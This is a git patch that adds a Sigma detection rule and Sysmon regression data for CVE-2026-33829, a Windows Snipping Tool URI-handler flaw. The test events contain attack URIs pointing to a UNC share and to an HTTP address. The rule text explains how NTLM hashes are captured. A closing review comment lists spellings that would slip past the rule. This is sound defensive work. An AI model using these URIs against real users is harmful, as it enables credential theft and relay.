From 3305d11c890dcab255007366f1aaf4153d47f191 Mon Sep 17 00:00:00 2001 From: Swachchhanda Shrawan Poudel <87493836+swachchhanda000@users.noreply.github.com> Date: Tue, 28 Apr 2026 04:43:55 +0545 Subject: [PATCH] Merge PR #5942 from @swachchhanda000 - Add `Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI` new: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI --------- Co-authored-by: Nasreddine Bencherchali --- .../7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx | Bin 0 -> 69632 bytes .../7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json | 132 ++++++++++++++++++ .../info.yml | 13 ++ ...oc_creation_win_exploit_cve_2026_33829.yml | 36 +++++ 4 files changed, 181 insertions(+) create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json create mode 100644 regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml create mode 100644 rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml 
diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx new file mode 100644 index 0000000000000000000000000000000000000000..63ac9a9db85e33191353115cc2f5cdeaba64c7d3 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json new file mode 100644 index 000000000..169721b1e --- /dev/null +++ b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json 
@@ -0,0 +1,132 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2026-04-20T10:00:35.646624Z"
+ }
+ },
+ "EventRecordID": 86918,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2026-04-20 10:00:35.640",
+ "ProcessGuid": "0197231E-F943-69E5-A527-000000000800",
+ "ProcessId": 6180,
+ "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+ "FileVersion": "-",
+ "Description": "-",
+ "Product": "-",
+ "Company": "-",
+ "OriginalFileName": "-",
+ "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=%%5C%%5C172.16.137.159%%5Cshare",
+ "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+ "LogonId": "0x33e8d150",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+ "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+ "ParentProcessId": 6428,
+ "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+ "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2026-04-20T10:00:40.222623Z"
+ }
+ },
+ "EventRecordID": 86921,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2026-04-20 10:00:40.217",
+ "ProcessGuid": "0197231E-F948-69E5-A727-000000000800",
+ "ProcessId": 16492,
+ "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+ "FileVersion": "-",
+ "Description": "-",
+ "Product": "-",
+ "Company": "-",
+ "OriginalFileName": "-",
+ "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=http://172.16.137.159:8000/file.png",
+ "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+ "LogonId": "0x33e8d150",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+ "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+ "ParentProcessId": 6428,
+ "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+ "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
new file mode 100644
index 000000000..8dd08fcb3
--- /dev/null
+++ b/regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
@@ -0,0 +1,13 @@
+id: baeec889-f3aa-4a10-b913-71e94f741066
+description: N/A
+date: 2026-04-20
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+ title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 2
+ path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx
diff --git a/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml b/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml
new file mode 100644
index 000000000..296d28a6b
--- /dev/null
+++ b/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml
@@ -0,0 +1,36 @@
+title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+status: test
+description: |
+ Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:).
+ An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource.
+ When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash.
+ HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access.
+ The URI can be delivered via a malicious hyperlink, phishing email, or web page.
+references:
+ - https://x.com/BlackArrowSec/status/2044374743491424508
+ - https://x.com/SBousseaden/status/2044417029721997635
+author: Samir Bousseaden, Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2026-04-28
+tags:
+ - attack.credential-access
+ - attack.t1187
+ - detection.emerging-threats
+ - cve.2026-33829
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\SnippingTool.exe'
+ CommandLine|contains:
+ # '\\\\' = literal double backslash (UNC path start); '%5C' and '%%5C' are URL-encoded variations of the same backslash character
+ - 'ms-screensketch:edit?&filePath=\\\\'
+ - 'ms-screensketch:edit?&filePath=%%5C'
+ - 'ms-screensketch:edit?&filePath=%5C'
+ - 'ms-screensketch:edit?&filePath=http'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
+regression_tests_path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml
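Review bot: The four `CommandLine|contains` values in `selection` bind the remote-path check to the exact prefix `ms-screensketch:edit?&filePath=`, so a URI that places another parameter before `filePath`, or omits the leading `&` (`ms-screensketch:edit?filePath=\\host\share`), would not match even though SnippingTool.exe would receive the same remote path; whether the handler accepts those spellings is not shown here, but nothing in the rule excludes them and the bypass cost to an attacker is one character. Splitting the scheme check from the remote-path fragment keeps the rule robust to parameter order and still matches both regression events (`match_count: 2`), since each command line contains `ms-screensketch:` and one of the `filePath=` fragments. A forward-slash UNC form (`filePath=//host/share`) may also reach the SMB client if the handler normalizes paths the way Win32 does; that is worth testing before adding `'filePath=//'` and `'filePath=%2F%2F'`. The inline comment calling `%%5C` a "URL-encoded variation" is slightly misleading, since the doubled percent sign is not standard percent-encoding; rewording it to `# '%5C' is the URL-encoded backslash; '%%5C' is the doubled form observed in the regression data` keeps the rationale accurate.
```yaml
detection:
    selection_uri:
        Image|endswith: '\SnippingTool.exe'
        CommandLine|contains: 'ms-screensketch:'
    selection_remote:
        # '\\\\' = literal double backslash (UNC path start); '%5C' is the URL-encoded backslash; '%%5C' is the doubled form observed in the regression data
        CommandLine|contains:
            - 'filePath=\\\\'
            - 'filePath=%%5C'
            - 'filePath=%5C'
            - 'filePath=http'
    condition: all of selection_*
# … unchanged: falsepositives, level, regression_tests_path …
```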